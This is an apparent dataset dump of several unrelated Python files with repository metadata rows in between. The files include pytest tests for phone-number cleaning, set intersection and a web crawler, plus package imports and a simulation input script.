    """E.164 and national output formats are applied to every parsable number."""
    df_clean_e164 = clean_phone(df_phone, "messy_phone", output_format="e164")
    df_clean_natl = clean_phone(df_phone, "messy_phone", output_format="national")

    expected_e164 = df_phone.copy()
    expected_e164["messy_phone_clean"] = (
        ["+15552345678"] * 4
        + ["+15551234567", "+15552345678"]
        + ["+12345678901 ext. 1234"] * 2
        + ["2345678", "+18002995865", "+18664947227", "+18004685865"]
        + [np.nan] * 5
    )
    expected_natl = df_phone.copy()
    expected_natl["messy_phone_clean"] = (
        ["(555) 234-5678"] * 4
        + ["(555) 123-4567", "(555) 234-5678"]
        + ["(234) 567-8901 ext. 1234"] * 2
        + ["234-5678", "(800) 299-5865", "(866) 494-7227", "(800) 468-5865"]
        + [np.nan] * 5
    )
    assert expected_e164.equals(df_clean_e164)
    assert expected_natl.equals(df_clean_natl)
def test_clean_split(df_phone: pd.DataFrame) -> None:
    """split=True adds one column per phone-number component, without inference."""
    df_clean = clean_phone(df_phone, "messy_phone", split=True)
    expected = df_phone.copy()
    expected["country_code"] = (
        [np.nan] * 4 + ["1"] * 3 + [np.nan] * 3 + ["1"] * 2 + [np.nan] * 5
    )
    expected["area_code"] = (
        ["555"] * 6 + ["234"] * 2 + [np.nan] + ["800", "866", "800"] + [np.nan] * 5
    )
    expected["office_code"] = (
        ["234"] * 4
        + ["123", "234"]
        + ["567"] * 2
        + ["234", "299", "494", "468"]
        + [np.nan] * 5
    )
    expected["station_code"] = (
        ["5678"] * 4
        + ["4567", "5678"]
        + ["8901"] * 2
        + ["5678", "5865", "7227", "5865"]
        + [np.nan] * 5
    )
    expected["ext_num"] = [np.nan] * 6 + ["1234"] * 2 + [np.nan] * 9
    assert expected.equals(df_clean)
def test_clean_split_fix_missing(df_phone: pd.DataFrame) -> None:
    """fix_missing='auto' infers the country code for otherwise valid NANP numbers."""
    df_clean = clean_phone(df_phone, "messy_phone", split=True, fix_missing="auto")
    expected = df_phone.copy()
    # Unlike plain split, the country code is filled in wherever inferable.
    expected["country_code"] = ["1"] * 8 + [np.nan] + ["1"] * 3 + [np.nan] * 5
    expected["area_code"] = (
        ["555"] * 6 + ["234"] * 2 + [np.nan] + ["800", "866", "800"] + [np.nan] * 5
    )
    expected["office_code"] = (
        ["234"] * 4
        + ["123", "234"]
        + ["567"] * 2
        + ["234", "299", "494", "468"]
        + [np.nan] * 5
    )
    expected["station_code"] = (
        ["5678"] * 4
        + ["4567", "5678"]
        + ["8901"] * 2
        + ["5678", "5865", "7227", "5865"]
        + [np.nan] * 5
    )
    expected["ext_num"] = [np.nan] * 6 + ["1234"] * 2 + [np.nan] * 9
    assert expected.equals(df_clean)
def test_clean_inplace(df_phone: pd.DataFrame) -> None:
    """inplace=True drops the original column, keeping only the cleaned one."""
    df_clean = clean_phone(df_phone, "messy_phone", inplace=True)
    cleaned_values = (
        ["555-234-5678"] * 4
        + ["555-123-4567", "555-234-5678"]
        + ["234-567-8901 ext. 1234"] * 2
        + ["234-5678", "800-299-5865", "866-494-7227", "800-468-5865"]
        + [np.nan] * 5
    )
    expected = pd.DataFrame({"messy_phone_clean": cleaned_values})
    assert expected.equals(df_clean)
def test_clean_split_inplace(df_phone: pd.DataFrame) -> None:
    """split+inplace yields only the component columns, original dropped."""
    df_clean = clean_phone(df_phone, "messy_phone", split=True, inplace=True)
    expected = pd.DataFrame(
        {
            "country_code": (
                [np.nan] * 4 + ["1"] * 3 + [np.nan] * 3 + ["1"] * 2 + [np.nan] * 5
            ),
            "area_code": (
                ["555"] * 6
                + ["234"] * 2
                + [np.nan]
                + ["800", "866", "800"]
                + [np.nan] * 5
            ),
            "office_code": (
                ["234"] * 4
                + ["123", "234"]
                + ["567"] * 2
                + ["234", "299", "494", "468"]
                + [np.nan] * 5
            ),
            "station_code": (
                ["5678"] * 4
                + ["4567", "5678"]
                + ["8901"] * 2
                + ["5678", "5865", "7227", "5865"]
                + [np.nan] * 5
            ),
            "ext_num": [np.nan] * 6 + ["1234"] * 2 + [np.nan] * 9,
        }
    )
    assert expected.equals(df_clean)
def test_clean_split_inplace_fix_missing(df_phone: pd.DataFrame) -> None:
    """split+inplace+fix_missing='auto': components only, country code inferred."""
    df_clean = clean_phone(df_phone, "messy_phone", split=True, inplace=True, fix_missing="auto")
    expected = pd.DataFrame(
        {
            # Country code is inferred for every otherwise valid NANP number.
            "country_code": ["1"] * 8 + [np.nan] + ["1"] * 3 + [np.nan] * 5,
            "area_code": (
                ["555"] * 6
                + ["234"] * 2
                + [np.nan]
                + ["800", "866", "800"]
                + [np.nan] * 5
            ),
            "office_code": (
                ["234"] * 4
                + ["123", "234"]
                + ["567"] * 2
                + ["234", "299", "494", "468"]
                + [np.nan] * 5
            ),
            "station_code": (
                ["5678"] * 4
                + ["4567", "5678"]
                + ["8901"] * 2
                + ["5678", "5865", "7227", "5865"]
                + [np.nan] * 5
            ),
            "ext_num": [np.nan] * 6 + ["1234"] * 2 + [np.nan] * 9,
        }
    )
    assert expected.equals(df_clean)
def test_validate_value() -> None:
    """Spot-check validate_phone on scalars: NANP numbers, vanity letters, junk.

    Fix: replaced `== True` / `== False` comparisons (flake8 E712) with direct
    truthiness assertions; behavior tested is unchanged.
    """
    assert not validate_phone(1234)
    assert validate_phone(2346789)
    assert validate_phone("1 800 234 6789")
    # Non-NANP (UK) numbers are not considered valid.
    assert not validate_phone("+44 7700 900077")
    assert validate_phone("555-234-6789 ext 32")
    # Vanity numbers with letters are valid.
    assert validate_phone("1-866-4ZIPCAR")
    assert validate_phone("1-800-G-O-T-J-U-N-K")
    assert not validate_phone("123 ABC COMPANY")
def test_validate_series(df_phone: pd.DataFrame) -> None:
    """validate_phone on a Series returns an aligned boolean Series."""
    result = validate_phone(df_phone["messy_phone"])
    # First 12 fixture rows are parsable phone numbers, the last 5 are junk.
    expected = pd.Series([True] * 12 + [False] * 5, name="messy_phone")
    assert expected.equals(result)
| 22.016978
| 97
| 0.349861
| 1,223
| 12,968
| 3.566639
| 0.089943
| 0.207474
| 0.227877
| 0.325539
| 0.766162
| 0.74232
| 0.709537
| 0.697157
| 0.679276
| 0.662769
| 0
| 0.199201
| 0.517659
| 12,968
| 588
| 98
| 22.054422
| 0.498161
| 0.006246
| 0
| 0.825623
| 0
| 0
| 0.148536
| 0
| 0
| 0
| 0
| 0
| 0.030249
| 1
| 0.017794
| false
| 0
| 0.008897
| 0
| 0.02847
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
03fa27dc79bdc3060a8dcdd44f8bb1a47abc2615
| 168
|
py
|
Python
|
DTMT/dtmt/interface/__init__.py
|
fandongmeng/StackedDTMT
|
f10062f98a443ad67cadec68fa5abdc8ab60815f
|
[
"BSD-3-Clause"
] | 3
|
2020-09-22T07:33:29.000Z
|
2021-02-19T09:53:28.000Z
|
DTMT/dtmt/interface/__init__.py
|
fandongmeng/StackedDTMT
|
f10062f98a443ad67cadec68fa5abdc8ab60815f
|
[
"BSD-3-Clause"
] | null | null | null |
DTMT/dtmt/interface/__init__.py
|
fandongmeng/StackedDTMT
|
f10062f98a443ad67cadec68fa5abdc8ab60815f
|
[
"BSD-3-Clause"
] | null | null | null |
# coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from dtmt.interface.model import NMTModel
| 21
| 41
| 0.85119
| 23
| 168
| 5.608696
| 0.608696
| 0.232558
| 0.372093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006757
| 0.119048
| 168
| 7
| 42
| 24
| 0.864865
| 0.071429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ff0c06a54e2a35363e708249ef362923ab8c3b55
| 119
|
py
|
Python
|
__init__.py
|
pingryiRT/P2PPlatform
|
c4a1b69d85523687f161074e011a4222fee69ce0
|
[
"Unlicense"
] | null | null | null |
__init__.py
|
pingryiRT/P2PPlatform
|
c4a1b69d85523687f161074e011a4222fee69ce0
|
[
"Unlicense"
] | 12
|
2017-09-20T20:34:53.000Z
|
2017-10-30T04:15:07.000Z
|
__init__.py
|
pingryiRT/P2P-Platform
|
c4a1b69d85523687f161074e011a4222fee69ce0
|
[
"Unlicense"
] | null | null | null |
from .Network import Network
from .Peer import Peer
from .Message import Message
from .Message import message_from_xml
| 23.8
| 37
| 0.831933
| 18
| 119
| 5.388889
| 0.333333
| 0.226804
| 0.350515
| 0.494845
| 0.536082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134454
| 119
| 4
| 38
| 29.75
| 0.941748
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ff0f89e43e9520d8bd54b73cb3e0f4392aec4e94
| 11,318
|
py
|
Python
|
blahb/test/test_intersection.py
|
mvsaha/blahb
|
e4ea703fa0fc255f627057c07df4c51138299d8b
|
[
"MIT"
] | null | null | null |
blahb/test/test_intersection.py
|
mvsaha/blahb
|
e4ea703fa0fc255f627057c07df4c51138299d8b
|
[
"MIT"
] | null | null | null |
blahb/test/test_intersection.py
|
mvsaha/blahb
|
e4ea703fa0fc255f627057c07df4c51138299d8b
|
[
"MIT"
] | null | null | null |
import numpy as np
from ..flags import *
from ..setops import intersection_
from .utils import *
def test_intersection_NANFIRST():
    """Intersect with the DATA_NANFIRST merge rule: the first operand's
    value wins unless it is NaN, in which case the second's is taken."""
    left = make_indexset([0, 1, 3, 4, 5, 6, 7])
    left_data = make_data([na, -3, -6, na, -9, na, 1])
    right = make_indexset([4, 5, 6, 7, 9, 10, 11])
    right_data = make_data([na, na, -2, -5, na, -3, 7])
    merge_spec = np.array([DATA_NANFIRST], dtype=np.uint8)
    overlap = T([4, 5, 6, 7])

    # Neither operand carries data -> the result has none either.
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None
    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    # Data only on the first operand.
    left.data = left_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, na, 1]))

    # Data only on the second operand.
    left.reset_data()
    right.data = right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, na, -2, -5]))

    # Both carry data, left first.
    left.data, right.data = left_data, right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, -2, 1]))

    # Both carry data, right first.
    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, -2, -5]))
def test_intersection_NANLAST():
    """Intersect with the DATA_NANLAST merge rule: the second operand's
    value wins unless it is NaN, in which case the first's is taken."""
    left = make_indexset([0, 1, 3, 4, 5, 6, 7])
    left_data = make_data([na, -3, -6, na, -9, na, 1])
    right = make_indexset([4, 5, 6, 7, 9, 10, 11])
    right_data = make_data([na, na, -2, -5, na, -3, 7])
    merge_spec = np.array([DATA_NANLAST], dtype=np.uint8)
    overlap = T([4, 5, 6, 7])

    # Neither operand carries data -> the result has none either.
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None
    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    # Data only on the first operand.
    left.data = left_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, na, 1]))

    # Data only on the second operand.
    left.reset_data()
    right.data = right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, na, -2, -5]))

    # Both carry data, left first.
    left.data, right.data = left_data, right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, -2, -5]))

    # Both carry data, right first.
    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, -2, 1]))
def test_intersection_MIN():
    """Intersect with the DATA_MIN merge rule: element-wise minimum,
    NaN-propagating; requires data on BOTH operands to produce data."""
    left = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
    left_data = make_data([na, -3, -6, na, -9, na, 1, 3])
    right = make_indexset([4, 5, 6, 7, 8, 9, 10, 11])
    right_data = make_data([na, na, -2, -5, 10, na, -3, 7])
    merge_spec = np.array([DATA_MIN], dtype=np.uint8)
    overlap = T([4, 5, 6, 7, 8])

    # Neither operand carries data -> the result has none either.
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None
    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    # Data on only one side: MIN needs both, so result data stays None.
    left.data = left_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    left.reset_data()
    right.data = right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    # Both carry data; argument order does not change the minimum.
    left.data, right.data = left_data, right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, na, na, -5, 3]))

    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, na, na, -5, 3]))
def test_intersection_NANMIN():
    """Intersect with the DATA_NANMIN merge rule: element-wise minimum
    that ignores NaN; a single data-bearing operand passes through."""
    left = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
    left_data = make_data([na, -3, -6, na, -9, na, 1, 3])
    right = make_indexset([4, 5, 6, 7, 8, 9, 10, 11])
    right_data = make_data([na, na, -2, -5, 10, na, -3, 7])
    merge_spec = np.array([DATA_NANMIN], dtype=np.uint8)
    overlap = T([4, 5, 6, 7, 8])

    # Neither operand carries data -> the result has none either.
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None
    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    # Data only on the first operand passes through.
    left.data = left_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, na, 1, 3]))

    # Data only on the second operand passes through.
    left.reset_data()
    right.data = right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, na, -2, -5, 10]))

    # Both carry data; argument order does not change the NaN-aware minimum.
    left.data, right.data = left_data, right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, -2, -5, 3]))

    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, -2, -5, 3]))
def test_intersection_MAX():
    """Intersect with the DATA_MAX merge rule: element-wise maximum,
    NaN-propagating; requires data on BOTH operands to produce data."""
    left = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
    left_data = make_data([na, -3, -6, na, -9, na, 1, 3])
    right = make_indexset([4, 5, 6, 7, 8, 9, 10, 11])
    right_data = make_data([na, na, -2, -5, 10, na, -3, 7])
    merge_spec = np.array([DATA_MAX], dtype=np.uint8)
    overlap = T([4, 5, 6, 7, 8])

    # Neither operand carries data -> the result has none either.
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None
    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    # Data on only one side: MAX needs both, so result data stays None.
    left.data = left_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    left.reset_data()
    right.data = right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    # Both carry data; argument order does not change the maximum.
    left.data, right.data = left_data, right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, na, na, 1, 10]))

    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, na, na, 1, 10]))
def test_intersection_NANMAX():
    """Intersect with the DATA_NANMAX merge rule: element-wise maximum
    that ignores NaN; a single data-bearing operand passes through."""
    left = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
    left_data = make_data([na, -3, -6, na, -9, na, 1, 3])
    right = make_indexset([4, 5, 6, 7, 8, 9, 10, 11])
    right_data = make_data([na, na, -2, -5, 10, na, -3, 7])
    merge_spec = np.array([DATA_NANMAX], dtype=np.uint8)
    overlap = T([4, 5, 6, 7, 8])

    # Neither operand carries data -> the result has none either.
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None
    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    # Data only on the first operand passes through.
    left.data = left_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, na, 1, 3]))

    # Data only on the second operand passes through.
    left.reset_data()
    right.data = right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, na, -2, -5, 10]))

    # Both carry data; argument order does not change the NaN-aware maximum.
    left.data, right.data = left_data, right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, -2, 1, 10]))

    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, -2, 1, 10]))
def test_intersection_SUM():
    """Intersect with the DATA_SUM merge rule: element-wise sum,
    NaN-propagating; requires data on BOTH operands to produce data."""
    left = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
    left_data = make_data([na, -3, -6, na, -9, na, 1, 3])
    right = make_indexset([4, 5, 6, 7, 8, 9, 10, 11])
    right_data = make_data([na, na, -2, -5, 10, na, -3, 7])
    merge_spec = np.array([DATA_SUM], dtype=np.uint8)
    overlap = T([4, 5, 6, 7, 8])

    # Neither operand carries data -> the result has none either.
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None
    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    # Data on only one side: SUM needs both, so result data stays None.
    left.data = left_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    left.reset_data()
    right.data = right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    # Both carry data; addition is symmetric in the operand order.
    left.data, right.data = left_data, right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, na, na, -4, 13]))

    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, na, na, -4, 13]))
def test_intersection_NANSUM():
    """Intersect with the DATA_NANSUM merge rule: element-wise sum that
    treats NaN as absent; a single data-bearing operand passes through."""
    left = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
    left_data = make_data([na, -3, -6, na, -9, na, 1, 3])
    right = make_indexset([4, 5, 6, 7, 8, 9, 10, 11])
    right_data = make_data([na, na, -2, -5, 10, na, -3, 7])
    merge_spec = np.array([DATA_NANSUM], dtype=np.uint8)
    overlap = T([4, 5, 6, 7, 8])

    # Neither operand carries data -> the result has none either.
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None
    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    assert result.data is None

    # Data only on the first operand passes through.
    left.data = left_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, na, 1, 3]))

    # Data only on the second operand passes through.
    left.reset_data()
    right.data = right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, na, -2, -5, 10]))

    # Both carry data; addition is symmetric in the operand order.
    left.data, right.data = left_data, right_data
    result = intersection_(left, right, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, -2, -4, 13]))

    result = intersection_(right, left, merge_spec)
    AAE(result.loc, overlap)
    AAE(result.data, T([na, -9, -2, -4, 13]))
def test_intersection_randomized():
    """Cross-check intersection_ against Python set intersection on
    random integer coordinates for dimensionalities 1 through 5."""
    for ndim in range(1, 6):
        for _ in range(N_TESTS):
            size_a, size_b = np.random.randint(1, 2 ** ndim, size=2)
            coords_a = np.random.randint(0, 3, (size_a, ndim), dtype=np.int32)
            coords_b = np.random.randint(0, 3, (size_b, ndim), dtype=np.int32)
            first = IndexSet(coords_a, NO_FLAGS)
            second = IndexSet(coords_b, NO_FLAGS)
            combined = intersection_(first, second)
            expected = to_set(first) & to_set(second)
            assert to_set(combined) == expected
            assert combined.n == len(expected)
| 30.839237
| 68
| 0.47853
| 2,016
| 11,318
| 2.601687
| 0.03869
| 0.056435
| 0.036606
| 0.048808
| 0.91878
| 0.890562
| 0.890562
| 0.890562
| 0.890562
| 0.890562
| 0
| 0.075216
| 0.346881
| 11,318
| 366
| 69
| 30.923497
| 0.634334
| 0.141986
| 0
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.0375
| false
| 0
| 0.016667
| 0
| 0.054167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
209ae9cd3ec1fbc399e5b91b5cb8a296c0c62db7
| 282
|
py
|
Python
|
baobab/configs/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 8
|
2019-09-11T15:11:57.000Z
|
2022-02-03T08:24:52.000Z
|
baobab/configs/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 52
|
2019-08-29T00:39:11.000Z
|
2021-01-02T22:49:41.000Z
|
baobab/configs/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 2
|
2019-09-26T23:38:47.000Z
|
2020-02-18T10:07:04.000Z
|
from .parser import BaobabConfig
from . import tdlmc_diagonal_config
from . import tdlmc_cov_config
from . import tdlmc_empirical_config
from . import tdlmc_diagonal_cosmo_config
from . import gamma_diagonal_config
from . import gamma_cov_config
from . import gamma_empirical_config
| 35.25
| 41
| 0.861702
| 40
| 282
| 5.7
| 0.275
| 0.307018
| 0.421053
| 0.276316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109929
| 282
| 8
| 42
| 35.25
| 0.908367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
20e2a2664dce662682fda533cbf51f13b9da0af0
| 92
|
py
|
Python
|
trick_sims/Cannon/SIM_cannon_numeric/RUN_test/input.py
|
rmfranz13/trick
|
efffa146e6f235299e5559bf3e65252a0de9aae4
|
[
"NASA-1.3"
] | null | null | null |
trick_sims/Cannon/SIM_cannon_numeric/RUN_test/input.py
|
rmfranz13/trick
|
efffa146e6f235299e5559bf3e65252a0de9aae4
|
[
"NASA-1.3"
] | null | null | null |
trick_sims/Cannon/SIM_cannon_numeric/RUN_test/input.py
|
rmfranz13/trick
|
efffa146e6f235299e5559bf3e65252a0de9aae4
|
[
"NASA-1.3"
] | null | null | null |
# Load the real-time and data-recording configuration for the cannon sim.
# Fix: exec(open(path).read()) leaks the file handle until GC; use a
# context manager so each file is closed deterministically.
with open("Modified_data/realtime.py") as realtime_file:
    exec(realtime_file.read())
with open("Modified_data/cannon.dr") as recording_file:
    exec(recording_file.read())
| 30.666667
| 46
| 0.73913
| 14
| 92
| 4.714286
| 0.642857
| 0.242424
| 0.484848
| 0.606061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 92
| 2
| 47
| 46
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0.521739
| 0.521739
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
458effe3d1ca449534f0085cc1449dc35615ff94
| 2,710
|
py
|
Python
|
domain/test/test_webCrawler.py
|
AntoniPizarro/proyecto_dual
|
53b71a519912b5f79dd2af21db0aad27dfe101c7
|
[
"MIT"
] | 1
|
2020-11-18T19:41:23.000Z
|
2020-11-18T19:41:23.000Z
|
domain/test/test_webCrawler.py
|
AntoniPizarro/proyecto_dual
|
53b71a519912b5f79dd2af21db0aad27dfe101c7
|
[
"MIT"
] | 20
|
2020-11-19T22:48:25.000Z
|
2021-06-02T03:38:02.000Z
|
domain/test/test_webCrawler.py
|
AntoniPizarro/proyecto_dual
|
53b71a519912b5f79dd2af21db0aad27dfe101c7
|
[
"MIT"
] | null | null | null |
from src.scrappingLinks import webCrawler
import pytest
# pytest -v test/test_webCrawler.py
# THE TEST CASES GO HERE
# STARTING FROM EACH OF THE LINKS ON OUR WEB PAGE
@pytest.mark.programaCrawler
def test_indexWebPage():
    """Crawling index.html returns the expected links, in exact order."""
    assert webCrawler("https://proyectodual.000webhostapp.com/index.html") == ['https://proyectodual.000webhostapp.com/index.html', './catalogo.html', 'transports/v-wing.html', '../catalogo.html', 'transports/imperial-shuttle.html', 'transports/gr-75.html',
        'transports/crucero-alderaan.html', 'transports/aa-9.html', 'transports/twilight.html', 'transports/cañonera-republica.html', 'transports/neimoidian-escort.html', 'transports/magna-guard.html', 'transports/t70-xwing.html', 'transports/y-wing.html']
def test_CatalogoWebPage():
    """Crawling catalogo.html returns the expected links, in exact order."""
    assert webCrawler("https://proyectodual.000webhostapp.com/catalogo.html") == ['https://proyectodual.000webhostapp.com/catalogo.html', 'transports/v-wing.html', "../catalogo.html", 'transports/imperial-shuttle.html', 'transports/gr-75.html', 'transports/crucero-alderaan.html', 'transports/aa-9.html',
        'transports/twilight.html', 'transports/cañonera-republica.html', 'transports/neimoidian-escort.html', 'transports/magna-guard.html', 'transports/t70-xwing.html', 'transports/y-wing.html', './catalogo.html']
def test_contactoWebPage():
    """Crawling contacto.html returns the expected links, in exact order."""
    assert webCrawler("https://proyectodual.000webhostapp.com/contacto.html") == ['https://proyectodual.000webhostapp.com/contacto.html', './catalogo.html', 'transports/v-wing.html', '../catalogo.html', 'transports/imperial-shuttle.html', 'transports/gr-75.html',
        'transports/crucero-alderaan.html', 'transports/aa-9.html', 'transports/twilight.html', 'transports/cañonera-republica.html', 'transports/neimoidian-escort.html', 'transports/magna-guard.html', 'transports/t70-xwing.html', 'transports/y-wing.html']
def test_naveEjemplo():
    """Crawling a sample ship page (y-wing.html) returns the expected links."""
    assert webCrawler("https://proyectodual.000webhostapp.com/transports/y-wing.html") == ['https://proyectodual.000webhostapp.com/transports/y-wing.html', '../catalogo.html', 'transports/v-wing.html', 'transports/imperial-shuttle.html', 'transports/gr-75.html',
        'transports/crucero-alderaan.html', 'transports/aa-9.html', 'transports/twilight.html', 'transports/cañonera-republica.html', 'transports/neimoidian-escort.html', 'transports/magna-guard.html', 'transports/t70-xwing.html', 'transports/y-wing.html', './catalogo.html']
| 93.448276
| 358
| 0.669004
| 290
| 2,710
| 6.234483
| 0.193103
| 0.340708
| 0.132743
| 0.146018
| 0.875
| 0.875
| 0.704646
| 0.689712
| 0.63219
| 0.63219
| 0
| 0.019582
| 0.170849
| 2,710
| 28
| 359
| 96.785714
| 0.785047
| 0.038745
| 0
| 0.133333
| 0
| 0
| 0.661284
| 0.418301
| 0
| 0
| 0
| 0
| 0.266667
| 1
| 0.266667
| true
| 0
| 0.133333
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
45c346b6bcf330ea4354ceb34575e1c28f00bdf9
| 146
|
py
|
Python
|
backend/api/apps.py
|
DataHack-CSCE606/django-vue-template
|
